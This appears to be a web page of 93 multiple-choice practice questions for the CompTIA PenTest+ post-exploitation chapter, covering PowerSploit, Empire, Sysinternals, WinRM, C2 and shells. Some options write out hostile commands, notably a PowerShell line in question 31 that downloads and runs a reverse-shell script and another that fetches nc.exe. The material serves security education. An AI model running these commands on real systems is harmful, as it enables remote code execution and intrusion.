8. Post-Exploitation Techniques

Ref:📕CompTIA PenTest+ PT0-002 Cert Guide (Certification Guide) 2nd Edition

Press the Start button to begin the practice test.

PenTest+ (PT0-002) Chapter 08. Performing Post-Exploitation Techniques

1 / 93

What is a covert channel in the context of attacking and compromising systems?

A. A secret tunnel for data exfiltration from the attacker’s system to the victim’s system.

B. A technique that allows the attacker to transfer information objects between processes or systems that, according to a security policy, are not supposed to be allowed to communicate.

C. It’s a C2 utility that uses Twitter direct messages for command and control.

D. A special type of malware that hides its presence on the victim’s system.

2 / 93

Which of the following C2 utility allows attackers to use Twitter direct messages for command and control?

A. wsc2

B. WMImplant

C. DropboxC2

D. Twittor

3 / 93

Which of the followings are NOT correct according to the PowerSploit post-exploitation techniques?

A. PowerSploit is a collection of Python modules

B. PowerSploit scripts are typically exposed by launching a web service

C. PowerSploit module Invoke-DllInjection is used to inject a DLL into the process ID of your choosing

D. PowerSploit script Out-EncodedCommand compresses, Base64 encodes, and generates command-line output for a PowerShell payload script

4 / 93

What is the meaning of ’living-off-the-land’ in the context of post-exploitation activities?

A. The technique of using the compromised system’s resources and installed utilities for further exploitation

B. The method of keeping the compromised system running after the initial exploitation

C. The act of disconnecting the compromised system from a network and using it standalone

D. The strategy of installing additional malware on the compromised system to maintain control

5 / 93

What function does the Invoke-CredentialInjection module in PowerSploit serve?

A. It injects a DLL into the process ID of your choosing

B. It reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process

C. It creates logons with plaintext credentials without triggering a suspicious event ID 4648 (Explicit Credential Logon)

D. It adds persistence capabilities to a script

6 / 93

Which of the following Sysinternals tools could be used to remotely execute commands and view the output on an attacker’s own system?

A. PsPing

B. PsPassword

C. PsExec

D. PsShutdown

7 / 93

Which of the following Sysinternals tools can be used to kill processes on a Windows-based system during a penetration test?

A. PsExec

B. PsFile

C. PsKill

D. PsPing

8 / 93

What is the role of the Get-VolumeShadowCopy script in PowerSploit?

A. It lists the device paths of all local volume shadow copies.

B. It creates a new volume shadow copy.

C. It deletes a volume shadow copy.

D. It mounts a volume shadow copy.

9 / 93

What is the use of Get-MicrophoneAudio module in PowerSploit?

A. It copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures.

B. It reflects Mimikatz 2.0 in memory using PowerShell and can be used to dump credentials without writing anything to disk as well as for any functionality provided with Mimikatz.

C. It records audio from the system microphone and saves it to disk.

D. It performs network and Windows domain enumeration and exploitation.

10 / 93

Within the context of post-exploitation techniques, when PowerSploit is used, how is it typically exposed?

A. By directly initiating a database query

B. By launching a web service

C. By establishing a remote desktop connection

D. By connecting via FTP

11 / 93

What is the purpose of creating custom daemons and processes on a victim system during post-exploitation?

A. To slow down the victim system

B. To further compromise other systems or exfiltrate data

C. To enhance the victim’s system security

D. To perform system updates

12 / 93

What is a key advantage of using the Empire framework for post-exploitation?

A. It only works with PowerShell Windows agent

B. It requires the use of powershell.exe

C. It includes adaptable communications to evade detection

D. It doesn’t allow the deployment of post-exploitation modules

13 / 93

What is the use of the PowerSploit module ’Invoke-DllInjection’ during post-exploitation?

A. It reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process

B. It injects a DLL into the process ID of your choosing

C. It injects shellcode into the process ID of your choosing or within PowerShell locally

D. It reflects the load of Mimikatz 2.0 in memory using PowerShell

14 / 93

What is one main use of the Empire post-exploitation framework?

A. Only for uploading trojan viruses

B. Primarily for conducting DDoS attacks

C. For rapidly deploying post-exploitation modules including keyloggers, bind shells etc.

D. It cannot run PowerShell agents

15 / 93

What is the main advantage of PsExec for attackers during post-exploitation?

A. It enables remote control of the compromised system.

B. The output of the commands executed is displayed on the attacker’s local system.

C. It can launch application with system privileges.

D. It can directly copy programs to the victim system.

16 / 93

How can an attacker use the Windows Task Scheduler for post-exploitation?

A. They can use it to locate the IP address of the victim’s system.

B. They can use it to create a new administrator account.

C. They can use it for automated execution of tasks on a local or remote computer, potentially bypassing UAC and stealing data over time.

D. They can use it to disconnect the victim’s system from the network.

17 / 93

What is the purpose of the Invoke-NinjaCopy PowerSploit module?

A. It creates logons with plaintext credentials without triggering a suspicious event.

B. It injects shellcode into the process ID.

C. It copies a file by reading the raw NTFS-partitioned volume.

D. It injects a DLL into a process.

18 / 93

Which of the following describes the PowerSploit module ’Invoke-Portscan’?

A. It injects a DLL into the process ID of your choosing.

B. It does a simple TCP port scan using regular sockets, based rather loosely on Nmap.

C. It retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

D. It lists available logon tokens, creates processes with other users’ logon tokens, and impersonates logon tokens in the current thread.

19 / 93

What is the primary purpose of the steghide tool in a cyber attack?

A. To perform a Denial of Service attack on the target system

B. To extract sensitive data (such as credit card data) from an image or video file by using steganography

C. To hide a message or sensitive data within an image or a video file by using steganography

D. To detect and remove malware from the target system

20 / 93

What best describes the use of the Twittor utility according to this text?

A. Twittor is used for creating multiple reverse shells.

B. Twittor uses Twitter direct messages for command and control.

C. Twittor is used for creating a DNS-based C2 utility that supports encryption.

D. Twittor uses Dropbox for command and control.

21 / 93

What is the function of the ’Invoke-WmiCommand’ in PowerSploit?

A. Injects a DLL into the process ID

B. Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel

C. Encrypts text files/scripts

D. Performs network and Windows domain enumeration and exploitation

22 / 93

What is the main goal of lateral movement, a post-exploitation technique?

A. To reverse engineer password hashes

B. To move from one device to another to avoid detection, steal sensitive data, and maintain access to the devices

C. To share sensitive data broadly within the organization

D. To move sensitive data from outside an organization’s perimeter to inside without permission

23 / 93

Which of the following statements about Windows Remote Management (WinRM) is incorrect?

A. WinRM is typically managed by Windows Group Policy

B. An attacker cannot use WinRM for post-exploitation activities

C. WinRM can be enabled on a Windows system with the command ’Enable-PSRemoting -SkipNetworkProfileCheck -Force’

D. The command ’Enable-PSRemoting -SkipNetworkProfileCheck -Force’ configures the WinRM service to automatically start and allows inbound connections

24 / 93

What is the primary use of the Empire PowerSploit suite during penetration testing?

A. To encrypt and decrypt scripts

B. To gather data for social engineering

C. To perform post-exploitation techniques

D. To serve as a firewall

25 / 93

What is the purpose of the ’New-ElevatedPersistence Option’ module in PowerSploit?

A. Adds persistence capabilities to a script

B. Configures elevated persistence options for the Add-Persistence function

C. Injects a DLL into the process ID of your choosing

D. Injects shellcode into the process ID of your choosing or within PowerShell locally

26 / 93

What is the role of Windows Remote Management (WinRM) in post-exploitation techniques?

A. WinRM is used to disable certain functions that prevent further exploitations.

B. WinRM can be used by an attacker to maintain persistent access to compromised systems.

C. WinRM is used to close the loopholes an attacker might use to gain unauthorized access.

D. WinRM is used to create new user accounts that can be used for future exploitations.

27 / 93

What is the purpose of using Get-GPPPassword module in PowerSploit?

A. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences

B. Takes a webcam picture of a compromised macOS X system

C. Acts as a clearinghouse of common privilege escalation checks

D. Mounts a volume shadow copy

28 / 93

Which PowerSploit module would you use for injecting a DLL into the process ID of your choosing?

A. Invoke-Shellcode

B. Invoke-DllInjection

C. Invoke-ReflectivePE Injection

D. Invoke-WmiCommand

29 / 93

What is a covert channel in the context of Command and Control (C2) in post-exploitation techniques?

A. It is a tool that manages the server within a virtual machine.

B. It is an adversarial technique to transfer information between processes or systems that are not meant to communicate.

C. It is a utility that uses Twitter direct messages for command and control.

D. It is the server used for command and control tasks.

30 / 93

Which of the following is NOT a post-exploitation technique performed by PowerSploit?

A. Injection of shellcode into a process ID

B. Stripping comments and extra whitespace from a script

C. Taking a picture through macOS’s webcam

D. Injecting a DLL into a process ID

31 / 93

Which of the following PowerShell commands can be used for post-exploitation tasks to avoid detection by security products and antivirus software by loading a PS1 file from the Internet and executing it on the device?

A. PS > IEX (New-Object Net.WebClient).DownloadString(’http:// /Invoke-PowerShellTcp.ps1’)

B. Get-Process | Export-Csv procs.csv

C. Get-Command

D. (New-Object System.Net.WebClient). DownloadFile (“http://10.1.2.3/nc.exe”, “nc.exe”)

32 / 93

Which of the following best describes the use of PowerSploit and Empire in a post-exploitation context?

A. PowerSploit and Empire are used for DICOM digital ion control attacks

B. PowerSploit and Empire are used as GPIO and UEFI interface exploit platforms

C. PowerSploit and Empire are PowerShell-based tools for post-exploitation techniques like data exfiltration, keylogging, and evading detection

D. PowerSploit and Empire are machine learning algorithms for traffic sniffing and packet routing

33 / 93

How can an attacker maintain persistent access to a compromised Windows system using Windows Remote Management (WinRM)?

A. By disabling WinRM to prevent further connections

B. By using WinRM to delete all user accounts

C. By enabling WinRM to allow further connections

D. By suppressing logs through WinRM

34 / 93

Which of the following is not true about PowerSploit and Empire?

A. PowerSploit and Empire are both post-exploitation tools.

B. PowerSploit is used for only post-exploitation phase of an assessment.

C. PowerSploit exposes scripts by launching a web service.

D. Empire includes a PowerShell Windows agent and a Python Linux agent.

35 / 93

What does the Add-Persistence module in PowerSploit do?

A. Adds persistence capabilities to a script

B. Injects shellcode into the process ID of your choosing

C. Executes a PowerShell ScriptBlock on a target computer and returns its formatted output

D. Reflectively loads a Windows PE file into the PowerShell process

36 / 93

Which Sysinternals tool can a penetration tester use to change passwords on a compromised system?

A. PsExec

B. PsPassword

C. PsService

D. PsInfo

37 / 93

Which Sysinternals tool allows a penetration tester to interact with executables on a compromised host?

A. PsInfo

B. PsPing

C. PsExec

D. PsList

38 / 93

What are some ways to maintain persistence in a compromised system according to the CompTIA PenTest+ (PT0-002) study material?

A. Creating and manipulating scheduled jobs and tasks

B. Deleting system files

C. Deploying antivirus software

D. Turning off the compromised system

39 / 93

Which of the following statements about the use of PowerSploit and Empire in post-exploitation is correct?

A. PowerSploit is used for injecting scripts into the victim’s system using physical means

B. Empire does not support the use of PowerShell agents

C. PowerSploit exposes scripts by launching a web service, allowing the compromised machine to download scripts for data exfiltration

D. Empire can only be used on Windows systems

40 / 93

What framework is mentioned in the text that offers the ability to run PowerShell agents without the need for powershell.exe?

A. PowerSix

B. PowerSploit

C. Empire

D. Kali Linux

41 / 93

Which of the following is true about PowerSploit and Empire?

A. Empire is a PowerShell based post-exploitation framework only for Windows.

B. PowerSploit only works with a PowerShell Windows agent for post-exploitation.

C. PowerSploit exposes the scripts by starting a web service and the compromised system connects to the attacker’s Kali machine for data exfiltration.

D. Empire does not include modules such as keyloggers, reverse shells, and Mimikatz.

42 / 93

What function is served by the PsExec tool in the Sysinternals suite during post-exploitation in penetration testing?

A. It shuts down the compromised computer

B. It lists logged-in accounts on the compromised system

C. It uploads, executes, and interacts with executables on compromised hosts

D. It pulls event logs from the compromised system

43 / 93

What is the purpose of the ’Set-MasterBootRecord’ module in PowerSploit?

A. It injects a payload into the running application.

B. It establishes a bind shell on a compromised system.

C. It sets up persistence on the compromised system.

D. It overwrites the master boot record with the message of your choice.

44 / 93

What is the main goal of lateral movement in the context of post-exploitation techniques?

A. To collect and store password hashes

B. To move from one device to another to avoid detection, steal sensitive data, and maintain access to the devices to exfiltrate the sensitive data

C. To reverse engineer password hashes

D. To broadcast the theft of sensitive data

45 / 93

Which of the following is not a function of the PowerSploit post-exploitation PowerShell module?

A. Reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process or reflectively injects a DLL into a remote process.

B. Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

C. Copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures.

D. Encrypts the server’s root directory to prevent unauthorized access.

46 / 93

Which of the following techniques is NOT used as part of a C2 system?

A. Dropbox for C2 tasks

B. Twitter direct messages for command and control

C. Using a virtual machine in cloud services

D. Turning off the compromised systems

47 / 93

Which of the following Sysinternals tools allows you to remotely execute anything that can run on a Windows command prompt?

A. PsPing

B. PsGetSid

C. PsExec

D. PsKill

48 / 93

What is the main purpose of steghide in the context of penetration testing?

A. To encrypt data and store them on a cloud server

B. To hide sensitive data inside an image or a video file

C. To generate a password for a network connection

D. To make a system immune to penetration testing

49 / 93

What is the purpose of the PowerSploit script ’Invoke-Mimikatz’ as stated in the module/script description from Table 8-3?

A. To inject shellcode into the process ID of your choosing.

B. To reflectively load Mimikatz 2.0 in memory using PowerShell and can be used to dump credentials without writing anything to disk and for any functionality provided with Mimikatz.

C. Lists available logon tokens, creates processes with other users’ logon tokens, and impersonates logon tokens in the current thread.

D. Compresses, Base64 encodes, and outputs generated code to load a managed DLL in memory.

50 / 93

What is the purpose of the Out-Minidump module in the PowerSploit post-exploitation toolkit?

A. It generates a full-memory minidump of a process

B. It encrypts text files/scripts

C. It injects shellcode into the process ID of your choosing

D. It exposes PowerShell agents without the need for powershell.exe

51 / 93

Which command can an attacker use to enable Windows Remote Management (WinRM) on a Windows system?

A. Enable-PSRemoting -SkipNetworkProfileCheck -Force

B. Initiate-PSRemoting -IgnoreNetworkProfileCheck -Safe

C. Initiate-WinRM -BypassNetworkProfileCheck -Safe

D. Enable-WinRM -BypassNetworkProfileCheck -Force

52 / 93

What is a potential post-exploitation action an attacker could perform via PowerShell remoting?

A. Disable the device’s internet connection

B. Replace the operating system

C. Use the device to perform a large-scale DDoS attack

D. Access and manage the system remotely

53 / 93

What is the purpose of the Invoke-ReflectivePE Injection module in PowerSploit?

A. Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.

B. Creates logons with plaintext credentials without triggering a suspicious event.

C. Reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process or reflectively injects a DLL into a remote process.

D. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

54 / 93

Which post-exploitation module of PowerSploit is used to reflectively load Mimikatz 2.0 using PowerShell?

A. Invoke-DllInjection

B. Invoke-TokenManipulation

C. Invoke-Mimikatz

D. Invoke-Shellcode

55 / 93

Which of the following correctly describes the use of PowerSploit in post-exploitation?

A. PowerSploit is a collection of Python scripts that only works on Linux systems.

B. PowerSploit is used to deploy the Empire post-exploitation framework.

C. PowerSploit is a collection of PowerShell modules used for postexploitation where scripts are typically exposed by launching a web service.

D. PowerSploit requires direct physical access to the compromised system.

56 / 93

Which of the following functionalities can NOT be achieved using the Sysinternals suite in a post-exploitation scenario?

A. Remotely executing processes

B. Listing information about processes

C. Altering Windows firewall settings

D. Changing passwords

57 / 93

What does the Mimikatz 2.0 module listed in PowerSploit in Table 8-3 do?

A. Locates single-byte AV signatures

B. Executes a PowerShell ScriptBlock on a target computer

C. Reflectively loads Mimikatz 2.0 in memory using PowerShell and can be used to dump credentials without writing anything to disk as well as for any functionality provided with Mimikatz

D. Does a simple TCP port scan using regular sockets

58 / 93

In the context of post-exploitation penetration testing using Sysinternals and PsExec, what action can PsExec perform?

A. It prevents the execution of any process on the compromised host

B. It monitors network traffic on the compromised host

C. It remotely executes commands that can run on a Windows command prompt on a compromised host

D. It encrypts all data communication between the attacker and the compromised host

59 / 93

Which of the following statements describes the use of PowerSploit and Empire in post-exploitation techniques?

A. PowerSploit is used for data manipulation while Empire is used for data deletion

B. PowerSploit exposes scripts by launching a web service and Empire allows rapid deployment of post-exploitation modules

C. PowerSploit and Empire are both used strictly for keylogger implementation

D. PowerSploit functions as a cybersecurity firewall and Empire works as a cybersecurity detection tool

60 / 93

What is the fundamental difference between a bind shell and a reverse shell?

A. In a bind shell, the victim system initiates a connection back to the attacking system. In a reverse shell, the attacker opens a port on the compromised system and waits for a connection.

B. In a bind shell, the attacking system opens a port on the victim system. In a reverse shell, the victim system initiates a connection back to the attacker.

C. In a bind shell, the attacker opens a port or a listener on the compromised system and waits for a connection. In a reverse shell, the victim system initiates a connection back to the attacker system.

D. In a bind shell, the attacker initiates a connection to the victim system. In a reverse shell, the attacker waits for the victim to connect back.

61 / 93

Which PowerSploit Module is predominantly used for taking screenshots at regular intervals?

A. Invoke-TokenManipulation

B. Get-TimedScreenshot

C. Out-Minidump

D. Invoke-Portscan

62 / 93

What is the purpose of the Get-VolumeShadowCopy module in PowerSploit?

A. It creates a new volume shadow copy

B. It lists the device paths of all local volume shadow copies

C. It deletes a volume shadow copy

D. It mounts a volume shadow copy

63 / 93

What is the term used to refer to the use of legitimate tools to perform post-exploitation activities?

A. Land exploitation

B. Living-off-the-land

C. Fileless invasion

D. Silent operation

64 / 93

Which command is used to embed sensitive information within an image file using steghide?

A. steghide embed -ef secret.txt -cf websploit-logo.jpg

B. steghide embed -cf secret.txt -ef websploit-logo.jpg

C. steghide -ef secret.txt -cf websploit-logo.jpg

D. steghide -cf secret.txt -ef websploit-logo.jpg

65 / 93

What is the role of Windows Remote Management (WinRM) in post-exploitation activities?

A. It is used to remove backdoors.

B. It allows the infiltrator to connect further to the compromised system and maintain persistent access.

C. It is used in sanitizing media.

D. It is a tool for tracking and logging activities in a compromised system.

66 / 93

What is the purpose of Invoke-Mimikatz in PowerSploit?

A. It injects a DLL into the process ID of your choosing.

B. It encrypts text files/scripts.

C. It reflectively loads Mimikatz 2.0 in memory using PowerShell and can be used to dump credentials without writing anything to disk as well as for any functionality provided with Mimikatz.

D. It installs a security support provider (SSP) DLL.

67 / 93

What is the main use of BloodHound in a Windows Active Directory environment?

A. To implement security policies

B. To reveal the hidden relationships using graph theory

C. To make the system immune to attacks

D. To monitor the user activities

68 / 93

What is a covert channel in the context of cyber security?

A. An encrypted secure network for government communications

B. A dedicated channel for data backup

C. A technique that allows an attacker to transfer information between systems that are not supposed to be allowed to communicate

D. A secure messaging channel between two users

69 / 93

What is the main advantage of using Microsoft’s Remote Desktop Protocol (RDP) in post-exploitation?

A. RDP is impossible to detect by the user on the compromised system

B. RDP provides a full, interactive graphical user interface (GUI) of the remote compromised computer

C. RDP allows an attacker to increase the amount of traffic

D. RDP is not encrypted, making it easy for the attacker to monitor

70 / 93

Which among the following describes how PowerSploit is typically used in post-exploitation techniques?

A. PowerSploit scripts are hidden within the compromised system’s drive

B. PowerSploit is used by launching a web service that exposes the scripts

C. PowerSploit is only activated if the attacker has physical access to the compromised system

D. PowerSploit is visually displayed on the compromised system’s screen to intimidate the user

71 / 93

What functionality does the PowerSploit module called ’Invoke-Mimikatz’ provide?

A. Creates logons with plaintext credentials without triggering a suspicious event ID 4648 (Explicit Credential Logon)

B. Copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures.

C. Reflectively loads Mimikatz 2.0 in memory using PowerShell and can be used to dump credentials without writing anything to disk as well as for any functionality provided with Mimikatz

D. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences

72 / 93

What is the concept of fileless malware in the context of post-exploitation techniques?

A. Installing extra malicious software on the compromised system to perform malicious actions

B. Using installed applications and tools on a compromised system to perform malicious actions without the need to install any additional software

C. Using malicious software that hides itself in the system files

D. Infecting the system with viruses that do not need to make their presence known

73 / 93

What is the main goal of the lateral movement post-exploitation technique ?

A. To test the effectiveness of security solutions

B. To move from one device to another, avoid detection, steal sensitive data, and maintain access

C. To restore corrupted system files

D. To patch vulnerabilities in the network

74 / 93

What is the main goal of lateral movement in post-exploitation?

A. To steal sensitive data

B. To maintain access to the compromised devices

C. To move from one device to another to avoid detection

D. All of the above

75 / 93

What purpose does Windows Management Instrumentation (WMI) serve in Post-Exploitation Techniques?

A. It’s merely used for storing data

B. It helps automate administrative tasks on local computers

C. It aids in automating administrative tasks on remote computers

D. It increases the speed of the system

76 / 93

When using PsExec tool as part of Sysinternals suite post-exploitation, what is the key advantage for an attacker?

A. The tool modifies the victim system’s registry.

B. Any executed commands will display outputs on the attacker’s local system, not the victim’s system.

C. The tool provides undiluted access to all the victim system files.

D. The tool allows the attacker to automatically download all data from the victim’s system.

77 / 93

What is a characteristic of the PowerShell-based post-exploitation framework, Empire, used in cybersecurity?

A. It requires powershell.exe to run PowerShell agents

B. It is incapable of deploying keyloggers, bind shells, or reverse shells

C. It only supports a Windows agent

D. It implements the ability to run PowerShell agents without the need for powershell.exe

78 / 93

What is the purpose of a C2 (command and control) system in the context of cyber security attacks?

A. It is a utility used for data encryption.

B. It is used to send commands and instructions to compromised systems.

C. It safeguards the attacker’s system against counter-attacks.

D. It is used to detect vulnerabilities in the target system.

79 / 93

What can be done after compromising a system with root access according to the text?

A. Delete all existing accounts.

B. Set all passwords to be simple.

C. Create additional accounts with complex passwords.

D. Set all passwords to be the same.

80 / 93

Which of the following are components of the Empire post-exploitation framework?

A. A Python Windows agent

B. An HTML Kali Linux agent

C. A PowerShell MacOS agent

D. A Java Linux agent

81 / 93

What is the purpose of a covert channel in a command and control (C2) system?

A. To covertly transfer data from the attacker’s system to the internet

B. To allow an attacker to transfer information objects between processes or systems not supposed to communicate according to a security policy

C. To protect the attacker’s system from counter-attacks

D. To store information needed for future attacks

82 / 93

What is a covert channel in context of performing post-exploitation techniques and command and control systems?

A. A covert channel is the kind of communication only allowed by the security policy.

B. A covert channel refers to the use of specific services such as Twitter, Dropbox, and Photobucket for C2 tasks.

C. A covert channel allows the attacker to transfer information objects between processes or systems, which should not be allowed to communicate according to a security policy.

D. A covert channel is a kind of connection established by victims to communicate with security teams.

83 / 93

Which Sysinternals tool allows you to run commands that can reveal information about running processes?

A. PsFile

B. PsExec

C. PsPassword

D. PsList

84 / 93

Which of the following Sysinternals tools would a penetration tester ideally use to execute processes on a compromised host?

A. PsExec

B. PsLoggedOn

C. PsPing

D. PsPassword

85 / 93

Which of the following statements best describes the difference between a bind shell and a reverse shell?

A. A bind shell uses a shell environment to execute commands, and a reverse shell relies on PowerShell cmdlets to execute commands.

B. In a bind shell, an attacker opens a listener on the compromised system, whereas in a reverse shell, the victim initiates a connection back to the attacking system.

C. Reverse shells are tools used specifically on Linux systems, while bind shells are used on Windows systems.

D. Bind shells are more versatile and portable, whereas reverse shells are limited to certain commands and have restricted portability.

86 / 93

How does an attacker maintain persistent access to compromised systems using Windows Remote Management (WinRM)?

A. By disabling the WinRM service on the system

B. By setting up a firewall rule to block all inbound connections

C. By configuring the WinRM service to start automatically and allowing inbound connections

D. By enabling WinRM to disable all connections to the system

87 / 93

What is the function of Out-CompressedDll script in the PowerSploit module collection?

A. It injects a DLL into the process ID of your choosing

B. It executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel

C. It compresses, Base64 encodes, and outputs generated code to load a managed DLL in memory

D. It retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences

88 / 93

How can you use PowerSploit for remote attacks?

A. By loading modules in memory on a target computer

B. By inserting a malicious DLL into the attacker’s process

C. By using a PowerShell ScriptBlock on a local computer

D. By starting a web service and exposing the scripts

89 / 93

Which Sysinternals tool can be used by penetration testers to show the open files on a compromised host?

A. PsExec

B. PsKill

C. PsFile

D. PsShutdown

90 / 93

Which of the following describes the use of the PowerSploit module Invoke-Shellcode during post-exploitation?

A. It injects a DLL into the process ID of your choosing.

B. It lists available logon tokens, creates processes with other users’ logon tokens, and impersonates logon tokens in the current thread.

C. It injects shellcode into the process ID of your choosing or within PowerShell locally.

D. It copies a file from an NTFS-partitioned volume by reading the raw volume and parsing the NTFS structures.

91 / 93

What is the primary role of PowerSploit during the post-exploitation phase of a penetration test?

A. It serves as a defensive tool to prevent further breaches.

B. It enables the attacker to terminate processes on the compromised system.

C. It aids in the data exfiltration process by executing scripts on a compromised system.

D. It scans an IP address range for DNS PTR records.

92 / 93

Which feature of the post-exploitation tool Empire is not correctly described based on the provided text?

A. Empire is an open-source framework that includes a PowerShell Windows agent and a Python Linux agent.

B. Empire can run PowerShell agents without the need for powershell.exe.

C. Empire can rapidly deploy post-exploitation modules including keyloggers, bind shells, reverse shells, and Mimikatz.

D. Empire encrypts all communication and command outputs to ensure secure data exfiltration.

93 / 93

Which Sysinternals tool is used to execute anything that can run on a Windows command prompt remotely and modify Windows registry values?

A. PsInfo

B. PsService

C. PsShutdown

D. PsExec

Your score is

Boost Your Skills with Free Anki Flashcards

Click the download button to get the CompTIA Pentest+ Anki deck.

Master post-exploitation techniques with our CompTIA PenTest+ Chapter 08 practice questions.

This chapter covers maintaining access, data exfiltration, and other post-exploitation methods.
Utilize our free Anki decks to enhance your learning experience.
Visit CompTIA’s website for official exam resources.

Ready to wrap up your study?
Proceed to Chapter 09: Reporting and Communication to learn how to effectively communicate your findings.

8. Post-Exploitation Techniques

Press the Start button to begin the practice test.

Boost Your Skills with Free Anki Flashcards

Explore our other free practice tests:

Related Posts

The Affordable, Hands-On Josh Madakor IT Course that gets Results!

The Affordable, Hands-On Cyber Security that gets Results!

JOIN OUR

NEWSLETTER